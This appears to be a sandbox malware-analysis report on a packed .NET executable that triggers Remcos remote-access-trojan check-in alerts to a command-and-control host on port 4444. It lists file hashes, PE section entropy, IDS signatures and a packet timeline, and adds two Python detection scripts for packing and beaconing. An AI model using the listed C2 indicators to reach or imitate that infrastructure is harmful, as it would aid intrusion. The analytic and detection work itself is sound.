URL:https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
Preview:

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with no line terminators
Category:downloaded
Size (bytes):16
Entropy (8bit):3.875
Encrypted:false
SSDEEP:3:HesuCkYn:+s2Y
MD5:8666ACCA900248B6FF53EF1A2F7D34DB
SHA1:9A06EB704EC97A663D9B7AB81586E9B65C7E8F87
SHA-256:FE72C61E5E9D6F17591666FEEBFBDC9D782C1724887401A1EDD1237BEE7D5190
SHA-512:5EA6AC377210A131293A52C48CF843FDEAB3E32FD1E29D6701D479CB78685E4C95962ABF2DFA5FB5EF5F4DBC79BF832C1947F9B551C4F53C081D4A556CBE2792
Malicious:false
URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkNAwtLDxRgARIFDasRA68=?alt=proto
Preview:CgkKBw2rEQOvGgA=

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:downloaded
Size (bytes):3130
Entropy (8bit):4.790069981348324
Encrypted:false
SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:EBA6E81304F2F555E1D2EA3126A18A41
SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):18367
Entropy (8bit):7.7772261735974215
Encrypted:false
SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:240C4CC15D9FD65405BB642AB81BE615
SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:false
Preview:

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):72
Entropy (8bit):4.241202481433726
Encrypted:false
SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:9E576E34B18E986347909C29AE6A82C6
SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:false
Preview:{"Message":"The requested resource does not support http method 'GET'."}

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.901211828464333
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:4XYAW8PbZH.exe
File size:985'600 bytes
MD5:4a9440baa61be8363a372b0bbc5933ad
SHA1:9aa5380dc87829c6fa22e9029cadcab9f6221ef9
SHA256:51c0bcbc40451c10e3b56df10853156378e8dbfb32ee63ea936737d42818822c
SHA512:648bd4434ce14e15c3faba25945525fffec6dad028e8fe26982d70096ccd448ca6e114e10739b1e990ea65970db97897713b8054450f1cd98c9aacb596436b0c
SSDEEP:24576:fdFeteG2H+FLBvmhCWWmLiUZklZGIo/KCrB:FA9w+bvmhCWWpUZkbDo5rB
TLSH:492523A81E0AC95FD88217B40A72F37B96798D9DD4238213CBEDFCFB791165A611C2D0
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....tg..............0......$......R.... ... ....@.. ....................................@................................
Icon Hash:53952576d1abd26e
Entrypoint:0x4f0352
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x67740BD1 [Tue Dec 31 15:20:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf03000x4f.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x21a0.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xee378 | 0xee400 | 2562e4a7ac7e93da792a31214a120b17 | False | 0.9471559794727177 | data | 7.905744938169938 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf2000 | 0x21a0 | 0x2200 | 9262853a55a5ebb2d4bfcb69ec1a46a2 | False | 0.8986672794117647 | data | 7.474795553829732 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf6000 | 0xc | 0x200 | d9c13c0e3224df71674f95e3bfb0d707 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf20c8 | 0x1d72 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9698859113823295
RT_GROUP_ICON | 0xf3e4c | 0x14 | data | | | 1.05
RT_VERSION | 0xf3e70 | 0x32c | data | | | 0.4642857142857143
DLL | Import
mscoree.dll | _CorExeMain
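The section table above is the static tell worth reading before anything else: the only import is mscoree.dll!_CorExeMain (a .NET image, so the real code is CIL plus whatever the assembly carries), yet .text has an entropy of 7.906 bits per byte and a ZLIB complexity of 0.947, which is what encrypted or compressed data looks like, not compiled code. Plain x86 or CIL code normally sits well below 7, and the near-zero entropy of the 12-byte .reloc shows the other end of the scale. The script below is an added example and not Joe Sandbox's own tooling: it computes the same two measures over constructed section contents and applies a packed-executable heuristic. The thresholds, the exact definition of the zlib ratio (compressed size over original size, assumed to be comparable to the report's ZLIB Complexity column) and the sample bytes are all assumptions made here.

```python
import math
import random
import zlib
from dataclasses import dataclass

# Heuristic cut-offs (assumptions for this example, not Joe Sandbox's own values).
PACKED_ENTROPY = 7.2      # bits per byte; ordinary x86 or CIL code is usually 5.5 - 6.5
PACKED_ZLIB_RATIO = 0.9   # compressed/original; close to 1.0 means already compressed or encrypted
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040


@dataclass
class Section:
    name: str
    characteristics: int
    data: bytes          # raw section bytes as found on disk
    virtual_size: int    # SizeOfRawData vs VirtualSize is a second packing hint


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty/constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_ratio(data: bytes) -> float:
    """Compressed size divided by original size using zlib level 9 (assumed comparable to
    the report's 'ZLIB Complexity'); random or encrypted data does not compress at all."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def triage_section(sec: Section) -> dict:
    ent = shannon_entropy(sec.data)
    ratio = zlib_ratio(sec.data)
    executable = bool(sec.characteristics & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE))
    looks_packed = ent >= PACKED_ENTROPY and ratio >= PACKED_ZLIB_RATIO
    # A section that is much larger in memory than on disk is typically unpacked in place;
    # equal sizes (as for .text above) suggest the payload is decrypted somewhere else.
    grows_in_memory = sec.virtual_size > 2 * len(sec.data)
    return {
        "name": sec.name,
        "entropy": round(ent, 3),
        "zlib_ratio": round(ratio, 3),
        "executable": executable,
        "grows_in_memory": grows_in_memory,
        "suspicious": looks_packed and executable,
    }


def triage(sections) -> list:
    return [triage_section(s) for s in sections]


# Constructed sample sections (not bytes taken from the sample in this report):
#  - ".text": seeded pseudo-random bytes stand in for an encrypted payload
#  - ".text_plain": a repeated opcode-like pattern, i.e. what ordinary code compresses like
#  - ".reloc": a near-empty relocation section like the 0xc-byte one above
_rng = random.Random(1584203)
SAMPLE_SECTIONS = [
    Section(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
            bytes(_rng.getrandbits(8) for _ in range(65536)), 65536),
    Section(".text_plain", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
            b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x7d\x08\x85\xff\x74\x2a" * 4096, 65536),
    Section(".reloc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, b"\x00" * 0x200, 0xc),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_SECTIONS):
        print(finding)
```

High entropy alone is not proof of packing (a section full of compressed PNG resources, like .rsrc above, scores high too), which is why the heuristic only fires on sections that are also executable; the resource section is reported, not flagged.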
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-04T18:41:57.412631+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49734 | 185.234.72.215 | 4444 | TCP
2025-01-04T18:41:58.049544+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 185.234.72.215 | 4444 | 192.168.2.4 | 49734 | TCP
2025-01-04T18:41:59.200663+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49737 | 178.237.33.50 | 80 | TCP
2025-01-04T18:44:15.459474+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 185.234.72.215 | 4444 | 192.168.2.4 | 49734 | TCP
2025-01-04T18:46:15.509845+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 185.234.72.215 | 4444 | 192.168.2.4 | 49734 | TCP
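The IDS alerts fire on the unencrypted Remcos 3.x checkin to 185.234.72.215:4444 and on the server's responses, but the connection timeline in this report shows a second, signature-independent indicator: after the initial checkin the server side of the 4444 connection sends a packet roughly every 30 seconds (18:42:15, 18:42:45, 18:43:15 and so on), i.e. a keepalive with almost no jitter, while the HTTP connection to 178.237.33.50:80 shows only a handful of irregular retransmission-style retries. The script below is an added example, not part of the report or of any Joe Sandbox tooling: it parses a constructed excerpt modeled on this report's timeline (the same hosts, ports and timestamps, laid out as "timestamp | source port | dest port | source IP | dest IP"), collapses each request/response exchange into one event and reports flows whose inter-exchange intervals cluster around a single period. The burst gap, tolerance and minimum-interval thresholds are assumptions chosen for this example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

BURST_GAP = 1.0          # seconds; packets closer together than this are one exchange
MIN_GAPS = 3             # need at least this many intervals before calling a flow periodic
TOLERANCE = 0.10         # an interval is "regular" if within +/-10% of the median interval
REGULAR_FRACTION = 0.75  # fraction of regular intervals needed to report a beacon

LINE_RE = re.compile(
    r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+ \| (\d+) \| (\d+) \| (\S+) \| (\S+)$"
)
EPOCH = datetime(2025, 1, 1)  # only relative times matter, so any fixed reference works

# Constructed sample modeled on the connection timeline in this report (not the full table).
SAMPLE_PACKETS = """\
Jan 4, 2025 18:41:57.406241894 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:57.411204100 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:58.049544096 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:58.571553946 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:41:58.576474905 CET | 80 | 49737 | 178.237.33.50 | 192.168.2.4
Jan 4, 2025 18:42:15.414592981 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:42:15.449609995 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:42:45.423891068 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:42:45.425071001 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:43:15.437552929 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:15.471400023 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:43:45.450136900 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:45.452876091 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:43:48.405024052 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:49.479396105 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:53.185897112 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:44:15.459474087 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:44:15.486979008 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
"""


def parse_packet(line):
    """Return (seconds, src_ip, src_port, dst_ip, dst_port) for one timeline line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    base, frac, sport, dport, src, dst = m.groups()
    # strptime's %f accepts at most 6 digits and the report carries 9, so add the fraction by hand
    whole = (datetime.strptime(base, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds()
    return whole + float("0." + frac), src, int(sport), dst, int(dport)


def flow_key(src, sport, dst, dport):
    """Direction-agnostic flow identifier so both halves of a conversation land together."""
    return tuple(sorted([(src, sport), (dst, dport)]))


def find_beacons(text):
    flows = defaultdict(list)
    for line in text.splitlines():
        parsed = parse_packet(line)
        if parsed:
            secs, src, sport, dst, dport = parsed
            flows[flow_key(src, sport, dst, dport)].append(secs)
    report = {}
    for key, times in flows.items():
        times.sort()
        # keep only the first packet of each exchange; the rest is request/response chatter
        starts = [times[0]] + [t for prev, t in zip(times, times[1:]) if t - prev > BURST_GAP]
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        if len(gaps) < MIN_GAPS:
            continue
        period = statistics.median(gaps)
        regular = sum(1 for g in gaps if abs(g - period) <= TOLERANCE * period) / len(gaps)
        report[key] = {
            "bursts": len(starts),
            "period": round(period, 3),
            "regular_fraction": round(regular, 3),
            "beacon": regular >= REGULAR_FRACTION,
        }
    return report


if __name__ == "__main__":
    for key, info in find_beacons(SAMPLE_PACKETS).items():
        print(key, info)
```

Using the fraction of intervals near the median rather than the maximum deviation is deliberate: the first interval on the 4444 flow (checkin to first keepalive, about 18 s) is shorter than the steady 30 s cadence, and a max-deviation test would miss the beacon on exactly the flows where the initial handshake differs from the keepalive loop.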
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 18:41:56.637872934 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Jan 4, 2025 18:41:57.406241894 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:57.411204100 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:57.411353111 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:57.412631035 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:57.417340040 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:58.049544096 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:58.065434933 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:58.070276976 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:58.182714939 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:41:58.309828043 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:58.571553946 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:41:58.576474905 CET | 80 | 49737 | 178.237.33.50 | 192.168.2.4
Jan 4, 2025 18:41:58.576544046 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:41:58.580275059 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:41:58.585109949 CET | 80 | 49737 | 178.237.33.50 | 192.168.2.4
Jan 4, 2025 18:41:59.198915005 CET | 80 | 49737 | 178.237.33.50 | 192.168.2.4
Jan 4, 2025 18:41:59.200663090 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:41:59.452615023 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:41:59.457489967 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:42:00.187439919 CET | 80 | 49737 | 178.237.33.50 | 192.168.2.4
Jan 4, 2025 18:42:00.187484980 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:42:07.343873024 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:07.343905926 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:07.344031096 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:07.344484091 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:07.344497919 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:07.990710020 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:07.991084099 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:07.991100073 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:07.991947889 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:07.992000103 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:07.993434906 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:07.993489981 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:08.174015999 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:08.174024105 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:08.308828115 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:15.414592981 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:42:15.449609995 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:42:15.454463959 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:42:17.896356106 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:17.896398067 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:17.896455050 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:18.263135910 CET | 49761 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:42:18.263161898 CET | 443 | 49761 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:42:45.423891068 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:42:45.425071001 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:42:45.429851055 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:03.956942081 CET | 49723 | 80 | 192.168.2.4 | 199.232.214.172
Jan 4, 2025 18:43:03.956995010 CET | 49724 | 80 | 192.168.2.4 | 199.232.214.172
Jan 4, 2025 18:43:03.962238073 CET | 80 | 49723 | 199.232.214.172 | 192.168.2.4
Jan 4, 2025 18:43:03.962249994 CET | 80 | 49724 | 199.232.214.172 | 192.168.2.4
Jan 4, 2025 18:43:03.962281942 CET | 49723 | 80 | 192.168.2.4 | 199.232.214.172
Jan 4, 2025 18:43:03.962313890 CET | 49724 | 80 | 192.168.2.4 | 199.232.214.172
Jan 4, 2025 18:43:07.162628889 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:07.162676096 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.162743092 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:07.163099051 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:07.163142920 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.790222883 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.790412903 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:07.790421963 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.790700912 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.791111946 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:07.791162014 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.999334097 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:07.999398947 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:11.813519955 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:11.813566923 CET | 443 | 50105 | 142.250.186.68 | 192.168.2.4
Jan 4, 2025 18:43:11.813610077 CET | 50105 | 443 | 192.168.2.4 | 142.250.186.68
Jan 4, 2025 18:43:15.437552929 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:15.471400023 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:43:15.476188898 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:45.450136900 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:45.452876091 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:43:45.458849907 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:43:48.405024052 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:48.874857903 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:49.479396105 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:50.684556007 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:53.185897112 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:43:58.186664104 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:44:07.228368998 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:07.228393078 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:07.228640079 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:07.228748083 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:07.228760958 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:07.857075930 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:07.857572079 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:07.857592106 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:07.859011889 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:07.859074116 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:07.859425068 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:07.859507084 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:07.888223886 CET | 49737 | 80 | 192.168.2.4 | 178.237.33.50
Jan 4, 2025 18:44:08.067336082 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:08.067390919 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:11.890347958 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:11.890427113 CET | 443 | 50477 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:44:11.890552044 CET | 50477 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:44:15.459474087 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:44:15.486979008 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:44:15.491759062 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:44:45.467133045 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:44:45.473210096 CET | 49734 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 18:44:45.478071928 CET | 4444 | 49734 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 18:45:07.269371986 CET | 50584 | 443 | 192.168.2.4 | 142.250.186.164
Jan 4, 2025 18:45:07.269403934 CET | 443 | 50584 | 142.250.186.164 | 192.168.2.4
Jan 4, 2025 18:45:07.269458055 CET | 50584 | 443 | 192.168.2.4 | 142.250.186.164
